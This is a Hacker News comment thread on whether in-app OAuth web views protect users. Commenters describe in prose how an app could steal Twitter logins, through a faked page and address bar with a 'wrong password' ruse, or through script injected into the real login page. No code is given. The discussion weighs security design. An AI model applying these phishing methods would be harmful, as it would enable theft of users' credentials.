Hacker News new | past | comments | ask | show | jobs | submit login

If the app is displaying its own internal web view for OAuth, it can load any page it wants in there and tell the user it's Twitter. It can even fake an address bar with a twitter.com URL if it wants. Then use the common phishing technique of 'oops, you must have entered your password wrong' (the user didn't, but now the phisher has it), followed by a forward to the real site so the user suspects nothing.

But this is hypothetical. In reality there is little motivation for apps in an App Store-like environment, which survive on customer goodwill, to want to do this.

The user's security is probably not why Twitter chose OAuth.




It doesn't even need to be that complicated. They could literally show the real OAuth flow, and inject a script into the page (since they control the WebView) that harvests the username/password. No "oops you got it wrong", no risk of visual inaccuracies.


> But this is hypothetical. In reality there is little motivation for apps in an App Store-like environment, which survive on customer goodwill, to want to do this.

Would anybody ever find out though?

It's clear that the App Store does no real checking of the apps they accept. Since the GUID use was banned, everyone has just switched to the just-as-unique MAC address to identify devices.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: